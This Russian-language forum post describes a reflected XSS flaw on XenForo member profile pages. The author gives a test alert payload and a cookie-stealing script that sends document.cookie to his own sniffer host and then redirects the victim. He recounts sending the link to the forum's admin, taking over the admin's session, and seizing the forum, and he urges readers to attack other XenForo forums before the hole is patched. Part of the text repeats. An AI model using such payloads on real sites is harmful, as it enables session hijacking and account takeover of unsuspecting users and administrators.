- Регистрация
- 26.12.2012
- Сообщения
- 2 780
- Репутация
Решил я перед НГ порыться на нашем форуме в поисках xss-уязвимости...И наткнулся на интересную вещь
Выяснилось странная закономерность-страница профиля тринадцатого мембера любого ксенфоровского форума содержит пассивную xss.В видео для демонстрации был использован простенький скрипт с алертом
Но это ведь неинтересно и я решил пойти дальше и захватить кресло верховного главнокомандующего.Вместо скрипта выше вставил боевой скрипт который отсылает куки жертвы на мой сниффер и редиректит бедолагу на другую страничку,дабы тот не прочухал что-то неладное.
Так как я знал,что X-Shar не ждёт от меня подлости,то не стал заморачиваться с маскировкой,а просто отправил ему линк со скриптом в
После перехода в админке сниффера можно увидеть следующее (на мне в качестве примера):
Ну и осталось лишь воспользоваться добытыми куками ...
В честь НГ и нового владельца ресурса все ключники будут реабилитированы и их темы восстановлены.Олег наверное уйдёт на покой,ну или останется здесь управлять серверными делами.
С наступающим Новым годом!Гоу ломать ксенфорумы,пока дыру не прикрыли.
Код:
<script>alert('Предновогодний XSS!')</script>
Код:
<script> img = new Image(); img.src = "http://мой сниффер/s.gif?"+document.cookie;
location.href ="http://какая-нибудь страничка на этом форуме/" </script>
Вы должны зарегистрироваться, чтобы увидеть внешние ссылки
.После перехода в админке сниффера можно увидеть следующее (на мне в качестве примера):
Ну и осталось лишь воспользоваться добытыми куками ...
В честь НГ и нового владельца ресурса все ключники будут реабилитированы и их темы восстановлены.Олег наверное уйдёт на покой,ну или останется здесь управлять серверными делами.
С наступающим Новым годом!Гоу ломать ксенфорумы,пока дыру не прикрыли.
